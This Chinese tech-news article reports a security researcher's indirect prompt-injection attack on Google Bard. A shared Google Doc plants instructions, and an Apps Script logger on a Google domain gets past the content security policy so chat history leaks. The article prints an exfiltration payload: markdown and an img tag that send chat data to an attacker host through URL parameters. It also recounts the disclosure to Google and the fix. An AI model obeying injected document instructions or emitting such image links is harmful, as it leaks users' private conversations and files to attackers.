Redian新闻
>
谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

公众号新闻

机器之心报道

编辑:佳琪
操控 Bard 的秘密:运用一种叫提示注入(Prompt Injection)的技术,黑客可以只使用自然语言破解人工智能系统。


大型语言模型在生成文本时非常依赖提示词。这种攻击技术对于通过提示词学习模型而言可谓是「以彼之矛,攻己之盾」,是最强长项,同时也是难以防范的软肋。

提示词分为系统指令和用户给出的指令,在自然语言中,这两者难以区分。如果用户有意在输入提示词时,模仿系统指令,那么模型可能在对话里透露一些只有它才知道的「秘密」。

提示注入攻击有多种形式,主要为直接提示注入和间接提示注入。直接提示注入指用户直接向模型输入恶意指令,试图引发意外或有害的行为。间接提示注入指攻击者将恶意指令注入到可能被模型检索或摄入的文档中,从而间接地控制或引导模型。

有网友使用「系统指令」引导 GPT 泄露数据

最近,谷歌 Bard 迎来了一波强大的更新,Bard 增加了拓展功能,支持访问 YouTube,搜索航班和酒店,还能查阅用户的个人文件和邮件。

除此之外,Bard 可以连接到「谷歌全家桶」,访问你的谷歌云盘、文档和邮件!但这同时意味着 Bard 将分析不受信任的数据,容易受间接提示注入的影响。也就是说,不怀好意的人可能通过向你发送电子邮件或强行分享谷歌文档进行间接的提示注入攻击,因为对方发什么样的邮件、文档给你,你是控制不了的,但 Bard 却会无差别访问。

在安全风险分析领域有着 20 年经验的前微软 Azure 安全工程师 Johann Rehberger 体验了 Bard 的全新版本,并测试了被提示注入攻击时,Bard 的数据泄漏风险。

原博客链接:https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85

Johann 首先快速验证了提示注入的可行性。他通过让 Bard 分析旧的 YouTube 视频,并使用谷歌文档进行测试测试结果显示,Bard 确实按照他的额外提示进行了操作,这证明了接下来要进行的测试的可行性。


Bard 的漏洞:图像 Markdown 注入

在得知 Bard 可以被提示注入后,Johann 开始了进一步的研究。

LLM 应用中的一个常见漏洞是通过渲染超链接和图像来泄露聊天历史记录。问题是,这如何适用于谷歌 Bard?

当谷歌的大模型返回文本时,它可以返回 markdown 元素,Bard 将其呈现为 HTML! 这包括渲染图像的功能。

想象一下谷歌的大模型返回这样的文本:

![Data Exfiltration in Progress](https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION])

这将呈现为 HTML 图像标记,其 src 属性指向 attacker 服务器。

<img src="https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION]">

浏览器会自动连接到 URL,无需用户交互即可加载图片。借助 LLM 的强大功能,我们可以在聊天上下文中总结或访问以前的数据,并将其相应地附加到 URL 中。

在编写漏洞利用程序时,Johann 很快就开发出了一个提示注入有效载荷,它可以读取对话的历史记录,并形成一个包含该历史记录的超链接。然而,谷歌的内容安全策略(CSP)阻止了图像的渲染。这对攻击者来说是一个难题。


绕过内容安全策略

要从攻击者控制的服务器渲染图片,并不容易。谷歌的内容安全策略阻止从任意源加载图片。CSP 包含诸如 *.google.com *.googleusercontent.com 之类的源,相当广泛。这意味着应该能找到一种绕过方法。

研究后,Johann 得知了  Google Apps Script,这或许可以绕过 CSP 。

Apps Scripts 类似于 Office 里的宏,可以通过 URL 调用,并在 script.google.com(或 googleusercontent.com)域上运行。


如此一来,Bard Logger 可以在 Apps Script 中完成了。这个 Logger 将所有附加到调用 URL 的查询参数写入一个 Google Doc,而它正是外泄的目的地。


起初,Johann 以为这个方法并不可行,但他发现点击了几下 Apps Script 用户界面后,他找到了一个无需验证的设置。

接下来,一切准备工作就绪:

  • 确认了谷歌 Bard 易受通过扩展程序数据间接注入提示的影响
  • 谷歌 Bard 有允许零点击渲染图片的漏洞
  • 一个写有提示注入指令的恶意谷歌文档
  •  一个位于 google.com 上的日志端点,用于在图像加载时接收数据。

泄露过程

Johann 提供了他让 Bard 泄露数据的全过程。

原视频链接:https://www.youtube.com/watch?v=CKAED_jRaxw&t=4s

首先,和 Bard 先聊一些日常:


用户访问一个谷歌文档(The Bard2000),这导致攻击者指令注入和图像渲染。



攻击者通过 Apps Script 中的脚本将数据接收到谷歌文档。


以下是 Johann 用于「提示注入」的谷歌文档:


谷歌的修复

这个安全问题已经于 2023 年 9 月 19 日报告给 Google VRP。

10 月 19 日,Johann 想要在 Ekoparty 2023 中进行演示,所以询问了关于这个漏洞的情况。Google 确认已经修复。目前还不太清楚谷歌采取了何种修复措施。但 CSP 没有修改,仍然可以渲染图像。因此,这可能是已经采取了一些过滤措施,以防止将数据插入到 URL 中。

参考链接:
https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85
https://www.youtube.com/watch?v=CKAED_jRaxw&t=4s



© THE END 

转载请联系本公众号获得授权

投稿或寻求报道:[email protected]

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
专利肩颈防漏风冬被,95%匈牙利白鹅绒,美国设计金奖之作,轻暖服帖网络犯罪分子层出不穷!数据泄露影响超4亿人,解决、预防措施用起来!闷声发大财!美男中$13.5亿大奖,女友“嘴巴漏风”到处乱说坏事:所有人都在要钱马拉松式39小时谈判!欧盟AI监管达成“里程碑协议”,直指ChatGPT和谷歌Bard大臣们怎么想?"妈妈让我来自首",7岁男孩在派出所写下"bǎozhèng书"从大脑活动中解码自然语言:任务与前沿方法头像|𝐒𝐡𝐚𝐫𝐞·招桃花头像完蛋!GPTs把王煜全的数据泄露了!咋回事儿?清华团队攻破GPT-4V、谷歌Bard等模型,商用多模态大模型也脆弱?第九章第三节 联邦司法系统的组织运作新研究:鸽子可以用类似人工智能方式解决问题;谷歌Bard聊天机器人升级,可实时生成回复丨AIGC日报复旦大学自然语言处理实验室:如何构建和训练ChatGPT首例!智能家居将气象数据泄露到国外,舟山个人被罚→3.48 秒「破百」的纯电 SUV,差点把我送走教孩子用自己的手指作画?这也太有创意了!内容丰富,提升认知能力孤独,寂寞的Amazon软件工程师大模型隐蔽后门震惊马斯克:平时人畜无害,提到关键字瞬间“破防”奥特曼:人类水平的 AI 即将出现;美团「破发」市值跌去八成;苹果推 Vision Pro 应用商店 | 极客早知道《自然》重磅:历时7年,中国科学家破解脊髓衰老之谜!研究提示补充维C或可抗衰老6012 血壮山河之随枣会战 南昌之战 5无独立MCU,知行科技iDC Mid「领跑」高性价比|年度好产品入围公示EMNLP 2023 | 通过化学知识和自然语言关联以增强生物领域的跨模态学习惊!加航遭网络攻击:大批数据泄露!飞多伦多航班遇险紧急降落!【教育】沪2023年下半年全国大学英语四、六级考试准考证明日开始打印!考前提示注意查收微调都不要了?3个样本、1个提示搞定LLM对齐,提示工程师:全都回来了网传学校安排“问题学生”转入引全班罢课,辽宁昌图教育局回应罕见病目录扩容,业界人士喜忧参半,20余种罕见肿瘤纳入引争议那咬一口香死人的流沙月饼T-Mobile涨价计划走漏风声 客户反弹…自动升级叫停【提示】关于儿童智能手表、激光笔、电动自行车头盔、萝卜刀、火漆印章的风险提示一条视频,炸出万千青春期家长的心酸,却又瞬间被点赞最高的留言破防…逾400万纽约人受到医疗公司数据泄露事件影响尘埃落定!中美直航本月起数量猛增,年底或有望每周60班航班!RTE2023数字化转型论坛开启报名:AIGC掀起数字化新浪潮|甲子光年
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。